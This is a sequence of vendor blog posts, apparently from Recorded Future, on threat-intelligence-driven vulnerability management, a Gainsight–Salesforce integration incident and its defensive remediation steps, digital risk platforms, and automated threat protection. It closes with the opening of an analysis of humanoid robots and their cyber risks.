3. Automate Prioritization with Risk Scoring: Leverage automated risk scoring systems that combine vulnerability data with threat intelligence to rank vulnerabilities. Dynamic risk scores (such as Recorded Future’s risk score, Microsoft’s MSRC ratings, or community metrics like CISA’s KEV and EPSS) can update continuously based on new intel. Set up your workflow so that newly discovered vulnerabilities are automatically scored for risk and use these scores to automatically reorder your patch queue.
4. Create Dashboards for Real-Time Monitoring: Develop dashboards or reports that give a consolidated, real-time view of your organization’s vulnerability risk landscape. These dashboards should blend vulnerability scanning results with threat intelligence indicators. Security operations center (SOC) analysts can monitor such a dashboard to catch critical intel updates. If a new exploit is detected for a CVE present in your network, it can be flagged immediately. Dashboards provide ongoing visibility and help both technical teams and executives understand the state of vulnerability risk at a glance.
5. Continuously Refine Based on Threat Trends: Integration is not a one-and-done project. It requires continuous improvement. Establish a feedback loop where after each patch cycle or major threat event, the teams review what was learned. Did threat intelligence correctly predict which vulnerabilities were most important? Were there incidents that revealed a missed vulnerability despite available intel? Use these insights to adjust your processes. Threat trends evolve constantly, so your integrated program should adapt.

Recorded Future: Taking a Holistic Cybersecurity Approach

Recorded Future’s Intelligence Platform is designed to bridge the gap between threat intelligence and vulnerability management, enabling a truly holistic approach to cyber risk reduction. With Recorded Future’s Vulnerability Intelligence module, organizations get real-time, contextual intelligence on vulnerabilities integrated directly into their workflows:

• Real-Time Risk Scoring and Alerts: Recorded Future provides a dynamic risk score for each emerging vulnerability, updated in real time based on factors like active exploit availability, mentions by threat actors, links to malware (e.g. ransomware), and underground chatter. Instead of relying solely on CVSS, security teams see a threat-informed risk rating that tells them which vulnerabilities require immediate action.
• Actionable Context and Intelligence: Each vulnerability entry in the platform comes enriched with context. Analysts can quickly see if a vulnerability has known ties to adversaries or malware, if there are references in dark web sources, or if a proof-of-concept exploit is circulating. Recorded Future’s Intelligence GraphⓇ correlates data from across the open web, dark web, technical sources, and its own research to paint a full picture.
• Integration with VM Tools and Workflows: Recorded Future integrates with leading security solutions to reduce friction, including vulnerability management systems like Tenable and Qualys, IT service management platforms like ServiceNow, and SIEMs like Splunk, eliminating tool-switching. Integrations include both sending threat intelligence to other tools as well as bringing in data to the Recorded Future Platform. Automatic Watch List connectors, like our Tenable Connector, automatically sync scan data to your Recorded Future Vulnerability Watch List, ensuring teams are continuously monitoring an up-to-date list of exposures currently in their tech stack. Additionally, our flexible API and browser extension support custom integrations for unique systems.

With these capabilities, Recorded Future helps organizations prioritize remediation with actionable intelligence, saving hours of manual research and significantly reducing the exposure window for high-risk vulnerabilities. Recorded Future empowers you to move from reactive vulnerability management to a threat-informed, efficient, and ultimately more effective program.

Best Practices for a Modern Program

Even with the right tools, success relies on following best practices that maximize the impact of an intelligence-driven vulnerability management program. Here are some best practices for a modern, integrated VM program:

• Adopt Continuous Monitoring Over Periodic Scanning: Rather than scanning for vulnerabilities once a month or quarter, shift to continuous or at least more frequent discovery. Threats evolve quickly, and new critical vulnerabilities can’t wait for the next scheduled scan. Use a combination of persistent scanning, agent-based monitoring, and third-party intelligence to achieve near-real-time visibility of new vulnerabilities in your environment.
• Align Patching with Business-Critical Assets: Not all assets are equal, and neither are vulnerabilities on those assets. Inventory your most critical applications, systems, and data, and incorporate that knowledge into your prioritization. Prioritize fixes that protect what matters most to the business.
• Foster Collaboration Between Teams: Encourage regular communication and joint processes between the vulnerability management team, threat intelligence analysts, incident responders, and even application developers. Breaking down silos ensures that everyone understands the bigger picture of risk and works together. It also helps in getting buy-in from IT and development teams on urgent patching: when they hear directly from threat intelligence about the potential fallout of not patching, it adds urgency beyond a typical IT ticket.
• Measure Success with Metrics: To continually improve and demonstrate value, track metrics that gauge both the efficiency and effectiveness of your vulnerability management program. Key metrics might include:
  • Mean Time to Remediation (MTTR) for critical vulnerabilities (are you patching faster as integration matures?)
  • Number of exploitable vulnerabilities remaining unpatched (is that trending down?)
  • Reduction in overall attack surface (perhaps measured by fewer findings on repeat scans or a drop in high-risk exposure as scored by your intel)
  • Compliance metrics like patch SLAs met
  • How often threat intelligence inputs lead to preventive action

Smarter Vulnerability Management with Threat Intelligence

Integrating threat intelligence with vulnerability management is a fundamental modernization of how an organization manages cyber risk. By infusing real-world context and automation into the VM process, security teams can make smarter decisions: they fix the vulnerabilities that are most likely to be used in an attack, and they fix them faster and more efficiently than before. The result is a vulnerability management program that is not only more accurate but also more agile and resilient in the face of today’s fast-moving threat landscape.

Ready to take your vulnerability management to the next level? Recorded Future’s Vulnerability Intelligence solution can help you get there. With real-time threat insights, automated risk scoring, and seamless integration into your existing tools, it provides everything you need to proactively reduce risk.

What happened

The security event came to light on November 19, when Salesforce detected suspicious API calls. The calls originated from non-allowlisted IP addresses through Gainsight applications integrated with Salesforce. To date, three unnamed customers are suspected to have been impacted. In response, Salesforce immediately revoked access tokens associated with Gainsight applications, restricted integration functionality, and launched an investigation.

The incident disrupted several Gainsight services, including Customer Success (CS), Community, Northpass, Skilljar, and Staircase, temporarily disabling their ability to read and write data from Salesforce. As a precautionary measure, other platforms, including Zendesk, Gong.io, and HubSpot, also disabled related CS connectors.

The threat landscape connection

Analysis of the indicators of compromise (IoCs) revealed concerning patterns. Some IP addresses involved in this incident, such as 109.70.100[.]68 and 109.70.100[.]71, were previously linked to an August 2025 campaign in which the financially motivated threat cluster UNC6040 compromised Salesforce CRM environments to exfiltrate sensitive data, indicating possible reuse of infrastructure against CRM targets. The August 2025 campaign reportedly coordinated with UNC6240, which claimed affiliation with the ShinyHunters extortion group, to demand payment from affected organizations.

Most of the IP addresses identified are Tor exit nodes or commodity proxy/VPN infrastructure with histories of abuse for malicious activities, including scanning, brute-force attacks, and web exploitation. This suggests that the threat actors are using shared anonymity services rather than custom command-and-control (C2) infrastructure.

Intelligence analysis also revealed malware samples communicating with these IP addresses across commodity families, including SmokeLoader, Stealc, DCRat, and Vidar.

While Gainsight has stated that it hasn’t identified evidence of data exfiltration, and while a specific threat actor has yet to be confirmed, the investigation is ongoing.

The broader risk: supply-chain compromise

This incident highlights a critical vulnerability in modern enterprise architecture: the risk of supply-chain compromise through trusted SaaS integrations. When OAuth tokens, API keys, and service accounts enable persistent access to enterprise CRM data, a breach in one connected application can potentially expose sensitive information across multiple platforms.

Despite no evidence of data exfiltration so far, customers using Gainsight-Salesforce integrations may face unauthorized access or credential misuse until proper reauthorization is completed. The potential exposure may extend beyond Gainsight to other connected applications, such as Zendesk, HubSpot, and Gong.io, that share authentication or data pipelines.

Immediate actions for affected organizations

Gainsight has already taken defensive measures, including rotating multi-factor credentials and restricting access to its VPN and critical infrastructure. However, customers who suspect exposure should consider taking the following actions:

Critical security steps:

• Revoke and rotate OAuth tokens and API keys associated with the Gainsight-Salesforce Connected App.
• Review Salesforce and Gainsight logs for anomalous API traffic, unexpected IP sources, or mass data exports.
• Apply IP allowlists to block connections from published IoCs.
• Implement conditional access and device trust validation for all connected apps.
• Enforce multi-factor authentication and reset access credentials on all privileged accounts.
• Isolate integrations with third-party vendors until reauthorization guidance is confirmed.

Gainsight-specific recommendations:

• Rotate S3 keys.
• Reset NXT passwords.
• Reauthorize affected integrations.
• Log in directly to NXT until the Salesforce Connected App is fully restored.

Looking ahead

As organizations increasingly rely on interconnected SaaS applications to power their operations, the security posture of each integration point becomes critical. This incident serves as a reminder that third-party applications with deep integrations into core business systems represent both operational efficiency and potential attack vectors.

Organizations should evaluate their connected application ecosystems, implement zero-trust principles for API access, and ensure robust monitoring of authentication and authorization activities across all integrated platforms. The days of "set and forget" SaaS integrations are over. Continuous validation and monitoring are essential to maintaining security in a connected enterprise environment.

Learn how to stay ahead of emerging threats. Contact us to speak with one of our threat intelligence experts.

• The traditional “digital perimeter” paradigm for enterprise cybersecurity is no longer relevant in today’s online landscape. Instead of defending one’s internal network from the outside world, organizations must shift to a model of digital risk that takes into account every possible point of compromise.
• Given the continuous influx of alerts and data facing organizations today, an essential aspect of effective enterprise cybersecurity today is an effective digital risk intelligence platform. And selecting the right one is of mission-critical importance to organizations’ overall security posture.
• When selecting a digital risk management platform, organizations should prioritize the following five key capabilities:
  • Visibility
  • Comprehensive brand and executive intelligence
  • Third-party and supply chain oversight
  • Credential monitoring
  • Integration and contextualization
• Recorded Future’s Intelligence Cloud platform provides the kind of comprehensive, contextualized, and integrated view that organizations require to manage digital risk effectively in today’s threat landscape.

Your Biggest Security Blind Spot is Now the Entire Internet

The “security perimeter” is a long-standing and deeply-ingrained idea in enterprise cybersecurity. However, what was once defined as the boundary protecting your organization’s internal network from the outside world is no longer a useful measure for understanding security posture. Today, the average organization’s actual attack surface is sprawling, variable and amorphous, consisting of every social media profile, cloud bucket, line of code in a third-party app, employee credential, and more.

Anywhere and everywhere your organization and its employees operate online represents a potential point of entry or compromise. And maintaining visibility into the various exposures, threats, and risks looming over that attack surface is incredibly difficult. Most security teams are drowning in disparate alerts coming from siloed systems, struggling to keep up with and make sense of them all.

Ultimately, this results in a situation in which teams lack a complete, holistic view and understanding of their state of digital risk. Digital risk is defined as the potential for financial loss, disruption, or reputational damage resulting from the digital technologies, data breaches, cyberattacks, or failures in IT systems and digital processes. It encompasses any threat that arises from an organization’s use of digital tools and platforms.

With so much to safeguard, and so much information to sift through, organizations must find more effective ways to quickly and accurately separate signal from noise. Central to this effort is finding a digital risk management platform that is able to deliver timely, unified, contextualized, and actionable intelligence—not just streams of data—to your team.

The following guide outlines the five mission-critical capabilities your digital risk management platform must have in order to keep pace with today’s perimeterless threat landscape.

5 Key Capabilities Your Digital Risk Management Platform Can’t Go Without

Evaluating a digital risk platform’s true value comes down to the following five core functions. Lacking even one of these creates a critical capabilities gap and can compromise your organization’s security posture in significant ways:

1. Visibility: A Complete, Bird’s-Eye View of Your Attack Surface

One of the most effective strategies employed by attackers today is to target the assets you don’t even know you own. After all, you can’t effectively defend what you don’t know exists. Things like shadow IT, exposed remote desktop protocols (RDP), and misconfigured cloud buckets are all excellent first entry points for an attacker to exploit.

That’s why, when considering digital risk management platforms, one of the most essential capabilities to look out for is the automated, continuous mapping of all these types of external assets (e.g., IPs, domains, certificates, cloud assets, code repositories). And for this kind of visibility to provide true value, this asset inventory must be enriched with vulnerability data and risk scores to not simply show you what’s there, but what’s exploitable and to what extent.

To defend your attack surface effectively, you need to see your organization the way an adversary does—with all of those blind spots illuminated, and the low-hanging fruit lit with high beams.

This level of continuous, prioritized visibility allows teams to move beyond asset discovery and toward risk-based defense. Platforms with capabilities like Recorded Future’s Attack Surface Intelligence deliver this comprehensive, continuous view, helping organizations identify and secure their most exposed points before they become entryways for attackers.

2. Comprehensive Intelligence: Real-Time Brand and Executive Protection

Brand impersonation, fraudulent social media accounts, and executive spoofing are among the fastest-growing forms of digital risk today. While the nature of these attacks differs significantly from more traditional breaches, that doesn’t mean they don’t come with serious consequences. Attacks like these can erode customer trust, hinder revenue, and even create regulatory exposure within minutes of going live.

Therefore, an effective digital risk intelligence platform must provide continuous monitoring across the entire digital landscape—not only for typosquatting domains (e.g., www.amazoon.com, facebok.com) but also on social media platforms, app stores, and the dark web. What’s more, when a threat is detected, the platform should enable rapid remediation through integrated or automated takedown services. Because these types of attacks can damage trust and revenue within minutes, speed is critical when it comes to detection and remediation.

Brand protection is no longer a marketing issue alone. This isn’t simply about how your company is perceived by the public. It is a core security requirement. With serious implications for revenue, regulatory compliance, reputation, and more, it is mission critical that your digital risk intelligence platform enables comprehensive and responsive brand and executive protection capabilities.

Recorded Future’s Brand Intelligence, for example, empowers teams to detect impersonation attempts in real time and act before harm spreads, keeping both the brand and its executives protected.

3. Securing Your Partnerships: Continuous Third-Party and Supply Chain Monitoring

Every vendor, supplier, and technology partner connected to your network expands your risk footprint. Today, as the average supply chain and number of third-party vendors expand exponentially, so do the associated risks. In fact, Verizon’s 2025 DBIR reports third-party involvement in breaches doubled to 30% (from ~15% the year prior).

With over a quarter (26%) of today’s organizations managing 250 or more third-party vendor relationships, monitoring third-party risk has become a daunting task. Remember, a breach in one of their environments can quickly become a problem of your own. Traditional vendor risk assessments and annual questionnaires simply can’t keep up with today’s enormous scale and rapid pace of change.

This is why an effective digital risk intelligence platform must provide continuous visibility into the security posture of all third parties in one’s ecosystem. This includes real-time monitoring for data leaks, mentions on dark web forums, and newly discovered vulnerabilities that could impact your organization through a shared dependency.

With Recorded Future’s Third-Party Intelligence solution, organizations can proactively monitor their supply chains, receiving alerts the moment a vendor shows signs of compromise. This kind of ongoing visibility transforms vendor risk management from a reactive checkbox exercise into a continuous, intelligence-driven process.

4. No Stone Left Unturned: Dark Web and Leaked Credential Monitoring

One-in-five data breaches are now the result of compromised credentials, with the total volume of compromised credentials surging by over 160% thus far in 2025 alone. Leaked credentials are one of the most exploited gateways for cyberattacks today, fueling everything from phishing campaigns to ransomware. Detecting these exposures before they’re used is essential for preventing account takeover and data loss.

That’s why real-time monitoring for leaked credentials is an essential capability for every modern digital risk intelligence platform. When selecting a platform, one must ensure it has persistent access to gated dark web forums, marketplaces, and paste sites where stolen data circulates. It must also be able to identify when employee or customer credentials appear for sale and correlate that data with active threat campaigns. Together, these capabilities form a backbone of defense that helps to prevent digital risk from impacting your business.

Recorded Future’s Threat Intelligence capabilities excel in this area, offering deep visibility into dark web ecosystems and issuing automated alerts for compromised credentials or stolen data. By integrating this insight into daily operations, security teams can act swiftly to prevent compromise or other harm as a result of compromised credentials, shutting down risks before they evolve into active exploitation.

5. Integration and Contextualization: A Unified Intelligence Core That Provides Context

Without a unified intelligence framework, even the best tools can create more confusion than clarity. Siloed systems generate endless alerts but rarely explain how one threat connects to another. This often results in a morass of disjointed data that leaves teams overwhelmed and uncertain of what actions to take in order to mitigate their digital risk.

It is only the most mature and advanced of digital risk management platforms that bring these disparate sources and signals together to create a single, coherent, and unified picture of an organization’s overall state and provide the context necessary to inform action. Such systems operate from a single intelligence graph: one that correlates data from the open, deep, and dark web, as well as technical sources like malware sandboxes and exploit feeds. This unified approach allows security teams to see how individual risks fit into broader attack narratives and stay ahead of threats as they manifest across the digital ecosystem.

For example, the platform should make it possible to connect a leaked credential to a threat actor exploiting a vulnerability in a vendor’s system (effectively combining multiple key capabilities to create a single, streamlined picture of specific threats in context). Recorded Future’s Intelligence GraphⓇ provides exactly that level of correlation, transforming raw data into actionable, prioritized intelligence that allows teams to make sense of the ever-evolving threat landscape and their organization’s place within it.

Together, these capabilities prove indispensable in the uphill battle that is digital risk protection. Lacking just one can be enough to undermine one’s efforts entirely.

The Universal Approach: Recorded Future’s Intelligence Cloud

Modern digital risk management is a complex task that consists of a multitude of systems and signals. Running and managing separate tools for brand monitoring, attack surface management, supply chain risk, and more often creates more problems than it solves. Each system generates its own alerts and dashboards, forcing analysts to piece together the full picture manually.

Recorded Future’s Intelligence Cloud eliminates that complexity. It unifies all five essential capabilities—attack surface visibility, brand protection, third-party intelligence, threat intelligence, and vulnerability intelligence—into one real-time, correlated platform. This comprehensive, integrated approach ensures every piece of data contributes to a larger understanding of risk. Instead of isolated alerts, users receive a complete threat narrative: what’s happening, why it matters, and what to do next.

Organizations that adopt this model not only strengthen their defenses but also gain the ability to prioritize resources effectively and demonstrate the ROI of intelligence-driven security.

Move From Reactive Defense to Proactive Intelligence

Most security teams are already overwhelmed by alerts. A digital risk intelligence platform shouldn’t add more—it should provide clarity. By consolidating external risk data into one unified view, organizations can make faster, better-informed decisions and shift from reactive defense to proactive intelligence.

Investing in a single, unified platform, like Recorded Future’s, that sees and connects everything reduces analyst fatigue, accelerates response, and empowers leaders to justify their security investments with confidence.

Yesterday’s perimeter-focused defense paradigm is over. Now, your organization must have visibility and control over every activity, portal, and point of entry online. Recorded Future’s Intelligence Cloud embodies this shift, offering the complete picture of digital risk every modern enterprise needs.

• Real-time intelligence at scale: Threat intelligence automation accelerates detection and response by processing vast threat data instantly, far faster than any manual analysis could achieve.
• Enhanced SOC efficiency: Automation filters false positives and handles repetitive tasks so analysts focus on true threats.
• Recorded Future advantage: Recorded Future’s Intelligence Cloud delivers automated threat protection through real-time data collection, machine learning analysis, and seamless integrations with tools like SIEM, SOAR, and EDR.
• Future-ready defense: AI and ML algorithms adapt to new attack patterns, enabling predictive threat detection and rapid response.

Introduction: The Need for Speed in Cybersecurity

Cyber threats are expanding in volume, complexity, and velocity. Enterprises receive thousands of security alerts every single day, and human analysts manually collecting and correlating threat data can’t keep up. These reactive workflows lead to slow threat detection and delayed response, giving attackers more time to cause damage. The result is not only missed attacks but also burned-out analysts, who face constant alert fatigue and repetitive tasks.

When a breach can unfold in minutes, organizations can’t afford hours (or days) of lag. Threat intelligence automation allows security teams to respond to indicators of compromise (IOCs) within seconds, stopping attacks before they spread—and reducing the potential financial and reputational damages from a breach. The push for speed has spurred a rise in AI and automation across cybersecurity as security leaders increasingly recognize how real-time, autonomous decisions can bolster defense.

What Is Automated Threat Protection?

Automated threat protection, also known as autonomous threat protection, refers to the use of advanced technologies—including AI and ML—to continuously gather, analyze, and act on threat intelligence without manual intervention. It streamlines the entire threat intelligence lifecycle, from data collection to detection to response, at machine speed.

Core capabilities of automated threat protection platforms include ingesting data from diverse sources (open web, dark web, technical feeds, internal logs, etc.), automatically correlating and analyzing threat signals, and triggering protective actions or alerts. Key functions often include real-time monitoring for IOCs, enrichment of alerts with contextual data, automated risk scoring of threats, and even initiating response workflows via SOAR (Security Orchestration, Automation, and Response) playbooks. These systems excel at processing information at a scale and speed impossible for human operators.

To illustrate the difference: in a manual workflow, if a new phishing domain targeting your company is discovered, an analyst might spend precious time gathering WHOIS information, checking threat feeds for references, assessing the domain’s legitimacy, and then coordinating a response. By the time this manual analysis is done, the phishing campaign could have claimed victims. In contrast, automated threat protection can instantly recognize the suspicious domain, enrich the alert with WHOIS data and threat actor profiles, check if the domain appears in malware or phishing databases, and even automatically block the domain via integrated security controls, all before a human even starts investigating.

How Threat Intelligence Automation Enhances Real-Time Security Decisions

Threat intelligence automation directly improves the speed and quality of security decisions in several ways:

Faster Detection and Response

Automation enables security teams to detect threats or intrusions within moments of their emergence. By automatically correlating internal logs with external intelligence feeds, an automated system can spot malicious activity and trigger a response in machine time. This might mean isolating a compromised host or alerting on a zero-day exploit mere seconds after it’s observed. The net effect is that incidents are contained before they escalate widely.

Reduced False Positives

Intelligent automation learns what “normal” looks like in an environment and filters out the noise of benign events or erroneous alerts. Over time, machine learning models can identify patterns of false positives and automatically dismiss or deprioritize them. By letting automation sift signal from noise, human analysts can reclaim hours of wasted time and focus attention on genuine threats.

Improved Threat Prioritization

Automated threat intelligence tools provide rich context around each indicator or alert instantly. For example, when an alert comes in, an automation system might automatically append information about the involved IP’s reputation, associated malware, threat actor groups, prevalence in the wild, and more. This contextual enrichment allows the system to assess which alerts pose the greatest risk.

Consistent, round-the-clock protection

Automated systems never sleep, operating 24/7 with consistency and scaling to handle surges in threat activity. This around-the-clock monitoring means critical warnings are never missed and aligns security operations to the always-on nature of cyber attacks. Automation also enforces consistency in how threats are handled; a playbook executed by a machine will run the same way every time, reducing the variability (and potential errors) of human responses.

Recorded Future’s Approach to Automated Threat Protection

Recorded Future’s Intelligence Cloud is a SaaS platform that delivers real-time, automated threat intelligence at scale. It continuously collects billions of data points from across the open web, dark web, technical sources (like malware feeds and network telemetry), as well as insights from Recorded Future’s own research team, Insikt Group®. All of this data is analyzed and risk-scored in real time using machine learning algorithms.

A key strength of Recorded Future’s approach is seamless integration. The Intelligence Cloud connects directly with popular SIEM, SOAR, EDR, and Threat Intelligence Platform (TIP) tools. This means when your SOC’s SIEM generates an alert, Recorded Future automatically enriches that alert with context within the tool you’re already using. If an alert about a suspicious IP comes into your SIEM, the Intelligence Cloud can, in real time, append that IP’s risk score, known associations, or related domains—even triggering automated response playbooks in your SOAR platform based on its intelligence.

Recorded Future’s platform assigns risk scores to IOCs in real time, using analytics that weigh factors like novelty, prevalence, and severity of associated threat activity. So when an alert involving a particular IOC hits a SOC, the Intelligence Cloud has already flagged it as high risk and enriched it with context, such as the ransomware family or threat actor.

Recorded Future’s approach centers on delivering actionable insight in real time and automating wherever possible. Teams can trust they’re never operating on out-of-date information, and that many threat defense actions are happening autonomously at machine speed.

Example use cases include:

• Phishing detection: Suppose a new phishing email campaign targeting a financial institution is identified. Recorded Future’s Intelligence Cloud can automatically spot the phishing domains or URLs as soon as they appear on phishing feeds or dark web forums, immediately flagging them as malicious, enriching them with context, and integrating with your email security or firewall to block them.
• Vulnerability prioritization: Recorded Future’s automation helps organizations stay ahead by tracking vulnerability disclosures and exploit chatter continuously. If a new critical vulnerability is published, the Intelligence Cloud will instantly assess if there are exploit kits or threat actors discussing it. Through integrations, it can automatically create a ticket in your ITSM or send an alert to your vulnerability management dashboard highlighting that this CVE is under active attack and should be prioritized.

Benefits of Adopting Recorded Future for Automated Threat Protection

Speed and Scale in Decision-Making

Through automation, organizations can make security decisions at a speed and scale that human teams alone cannot match. Threats are identified, contextualized, and even countered in real time. This machine-speed detection and response means attacks can be thwarted before they escalate into major incidents, compressing the threat response timeline from what might be hours or days down to minutes.

Better Resource Allocation

When you automate data gathering and initial threat analysis, skilled personnel are freed up to focus on what they do best: in-depth investigations, incident response, threat hunting, and security strategy. This not only improves job satisfaction but also means your team’s expertise is directed at tasks that truly require human judgement. This often leads to cost savings or the ability to handle more threats with the same headcount.

Continuous Monitoring With Global Visibility

Recorded Future provides continuous, 24/7 monitoring of threats worldwide. It’s like having an around-the-clock sentry that never takes a break. Organizations gain insight into emerging threats and external risks relevant to them, no matter where those threats originate. If a threat actor in another part of the world starts planning attacks against your industry, Recorded Future’s platform may pick up on early warning signs and automatically alert you. This means you’re not only monitoring your internal environment but also the external horizon for incoming risks, all through an automated system.

Reduced time to detect and respond

Ultimately, adopting an automated threat intelligence solution like Recorded Future dramatically reduces the Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR) for security incidents. Automated response or enrichment means incidents can be contained or remediated far faster. A faster detection/response cycle directly correlates with minimizing damage—the quicker you intercept an attack, the less harm it can do. If you can cut your detection time from the industry average of ~200 days down to near real-time, you potentially save millions in breach costs.

Strengthened security posture

By integrating real-time insights and automated actions into daily operations, organizations can close security gaps and achieve a more consistent defense posture. Automation ensures that no critical threat intelligence is missed or ignored, and that defenses are applied uniformly across the board. Moreover, automation enforces best practices automatically, ensuring processes are followed correctly every time. All of this leads to a significant uplift in an organization’s ability to prevent breaches and handle incidents effectively.

Practical Applications and Use Cases

Automated IOC Detection

Modern threat intelligence platforms can automatically detect and surface indicators of compromise that matter to your organization. Rather than relying on an analyst to manually find a malicious IP or file hash buried in feeds, automation pulls these out in real time. If chatter about a new malware hash or command-and-control server related to your industry appears on a dark web forum, for example, the system will immediately flag it, ensuring you learn of emerging threats the moment they arise.

Threat Hunting with Automated Enrichment

Threat hunters and researchers greatly benefit from automation when investigating suspicious events. Suppose an analyst is digging into an odd network beacon that might indicate a hidden attacker. With automated enrichment tools, they can get additional context in seconds, such as domain reputation, related threats, or historical occurrences of that indicator. The analyst enters the indicator and the platform aggregates intelligence from open source feeds, commercial intel, and internal data. This on-demand enrichment provides deeper insights instantly, improving both the speed and accuracy of threat hunts.

Proactive Defense Through Vulnerability Intelligence

Rather than playing catch-up after hackers exploit a vulnerability, organizations can use threat intelligence automation to stay ahead of exploits. Automated systems continuously track CVEs, exploit releases, and even discussions on hacking forums about particular software weaknesses. When something relevant to your tech stack pops up, the system will alert you and provide threat context (e.g., known exploits or ransomware leveraging that CVE). This proactive vulnerability intelligence means you can patch or implement mitigations before an attack hits.

There are a range of ways in which different sectors leverage threat intelligence automation in ways tailored to their unique challenges:

Financial Services

Banks and financial institutions face constant phishing, fraud, and account takeover attempts. Threat intelligence automation helps instantly flag things like fraudulent banking websites impersonating the institution, or dumps of customer credentials on the dark web. If a fake banking login page is spun up to phish customers, an automated system can detect that site and raise an alert before any customers fall victim. Similarly, automation assists in fraud detection by correlating internal transaction anomalies with known threat patterns in real time. If a series of suspicious money transfers aligns with a known fraud tactic described in threat intel reports, the system can bring it to analysts’ attention immediately.

Government

Government agencies and defense organizations are high-value targets for state-sponsored cyber attacks. Threat intelligence automation gives these SOCs an upper hand by continuously scanning for indicators of nation-state campaigns targeting them. For instance, an automated platform might monitor for malware signatures, spear-phishing themes, or infrastructure known to be used by groups hostile to a particular country. The moment something matching those patterns is found, the system immediately alerts the security team. This real-time awareness is critical for government SOCs to mobilize defenses against advanced threats.

Healthcare

Hospitals and healthcare providers are frequently targeted by ransomware, data theft, and other cyberattacks that can literally put lives at risk. Automated threat intelligence in healthcare monitors for signs of impending attacks and provides early warnings. If an underground forum post indicates interest in exploiting a particular healthcare software, the security team can be alerted to fortify that system preemptively. This sector also benefits from automation in disrupting criminal activities: for example, automated systems can detect illicit online marketplaces selling stolen patient data or fake pharmaceutical websites that could harm public trust.

Future of Threat Intelligence Automation

As cyber threats evolve, automated defense systems will evolve alongside them, becoming self-learning. In the near future, these systems could autonomously adjust detection thresholds or even launch countermeasures based on learned experience, further reducing the need for human tuning. Recorded Future is at the forefront of this trend, embedding advanced AI into its Intelligence Cloud for capabilities like predictive risk scoring, anomaly detection at scale, and automated decision support. The vision is that intelligence automation becomes an indispensable co-pilot for every security team, helping humans make better decisions faster.

However, it’s important to note that attackers are also embracing AI to automate and enhance their attacks. In response, defensive AI systems are being developed to spot AI-generated threats and respond at machine speed. In this escalating battle, organizations that invest early in threat intelligence automation and AI will possess the agile, self-updating defenses needed to counter AI-augmented cyber attacks.

Start Protecting Your Business With Threat Intelligence Automation Today

Cyber attacks are accelerating and evolving on a daily basis. This reality makes traditional, purely manual security operations untenable. The longer it takes to detect and respond to threats, the greater the potential damage. By automating intelligence collection and response, organizations drastically improve their chances of stopping breaches in time.

Recorded Future’s Intelligence Cloud offers an unparalleled combination of real-time breadth , analytical depth, and seamless actionability.

Ready to accelerate your security operations with threat intelligence automation? Reach out for a demo or trial to experience how real-time threat intelligence automation can make all the difference in protecting your business.

Advances in large-language models (LLMs) and the anticipated arrival of artificial general intelligence (AGI) are rapidly closing the gap between concept and capability. The prospect of humanoid robots functioning autonomously in workplaces and public spaces is moving from speculative to attainable.

Global population decline is accelerating the demand for humanoid robots designed to operate within human environments and offset growing labor shortages across industries.

A growing number of companies are developing humanoid robots for roles in manufacturing, customer service, and even athletic competition. Investors are positioning for long-term growth, with research suggesting that by 2060, more than three billion humanoid robots could be integrated into human society.

China appears poised to lead the field of humanoid robotics. Facing a steep population decline, its strategic emphasis on automation and robotics is becoming central to sustaining economic output and competitiveness.

Humanoid robots will almost certainly be vulnerable to cyberattacks, ranging from hijacking and data leaks to the formation of botnets. This highlights the urgent need to treat humanoid robots with the same rigorous cybersecurity standards as any connected system.

Figure 1: Summary of the conditions that could create a huge demand for humanoid robots in the coming years (Source: Recorded Future)

Analysis

Humanoid robots are general-purpose, bipedal robots modeled after the human form and designed to work alongside humans. They are currently being designed to work in factories, serve us, and look after us.

Understanding the increased attention being given to humanoid robotics begins with recognizing a primary driver: a global labor shortage caused by population decline. Modern economies rely on sustained consumption and productivity growth, both of which are underpinned by expanding populations. Yet, across much of the developed world, and increasingly in emerging markets, this two-century trend of population growth is reversing. The global workforce is shrinking, and the implications for economic output are profound. As traditional labor pools contract, humanoid robots represent a potential solution, a means of sustaining productivity and economic stability in the face of structural demographic change.

Figure 2: Forecasts indicate a global population decline, with developed economies projected to experience the most significant impact first (Source: The Economist)

Robots working in this capacity are not a new concept. For decades, specialized industrial robots have revolutionized manufacturing by enhancing productivity and mitigating labor shortages, particularly in aging societies such as Japan and South Korea. However, as global demographics shift and labor shortages accelerate, repetitive automation alone will not sustain economic growth. The next phase of robotics will require systems capable of operating seamlessly in environments designed for humans, robots with human-like forms, and, increasingly, human-like cognition.

Advances in LLMs have accelerated progress toward AGI, making human-like cognition in robots a plausible near-term reality. Combined with breakthroughs in robotics engineering and declining production costs, these developments position humanoid robots to extend far beyond industrial applications. They are poised to enter service sectors, healthcare, defense, and domestic care, therefore addressing critical workforce shortages driven by aging populations.

The commercial potential of the humanoid robot market is significant. Recognizing this, both startups and established corporations are making substantial investments in humanoid robotics. Leading artificial intelligence (AI) companies are investing in humanoid robotics to develop platforms that integrate their cognitive technologies into mobile, human-like forms. At the same time, automotive manufacturers with decades of experience in using robotics and specializing in mass production are investing in the humanoid robotics market and adapting their capabilities to mass-produce humanoid robots, viewing it as a natural evolution. Today, humanoid robots are deployed in industrial environments and showcased in global sporting events such as the inaugural 2025 Robot Olympics in Beijing.
While the production and manufacturing of humanoid robots is complicated and expensive, with each passing year, the cost of producing them is decreasing. Globally, analysts expect the average bill-of-materials (BOM) cost per humanoid robot to decrease to USD 13,000–17,000 by the early 2030s, thereby reducing the average purchasing cost per robot.

China, in particular, is leading the way. Some of its humanoid robots, such as Unitree’s R1 robot, can already be purchased for around USD 5,500.

Figure 3: Projected cost reductions associated with large-scale production increases (Source: Bank of America Institute “Humanoid Robots 101”)

Furthermore, unlike other countries that have attempted to offset labor shortages through immigration, China’s policy has been more focused on finding a technological solution rather than importing labor. China’s long-term planning and economic strategy appear to be increasingly focused on robotics, and it has spent the last decade preparing its industrial base to mass-produce robots. It comes as no surprise that Recorded Future’s Network Intelligence continues to reveal state–linked malware families targeting the robotics industry, likely seeking to acquire sensitive intellectual property.

Figure 4: Malware families targeting robotics industries (Source: Recorded Future)

Some speculative forecasts suggest that China could eventually field approximately 300,000,000 humanoid robots to compensate for its demographic decline, as its population is predicted to shrink significantly over the coming decades. Having dominated the production of electric vehicles, China and its leadership are now aiming to dominate the humanoid robotics sector as well. These robots might also be exported to other countries facing demographic stress, potentially generating massive revenue for China.

Figure 5: China leading with patent filings mentioning humanoid robots 2020-25 (left) (Source: Morgan Stanley, “The Humanoid 100”); graph showing the organisations that are filing for humanoid technological development (right) (Source: MITSUI & CO. “Humanoid Robots”)

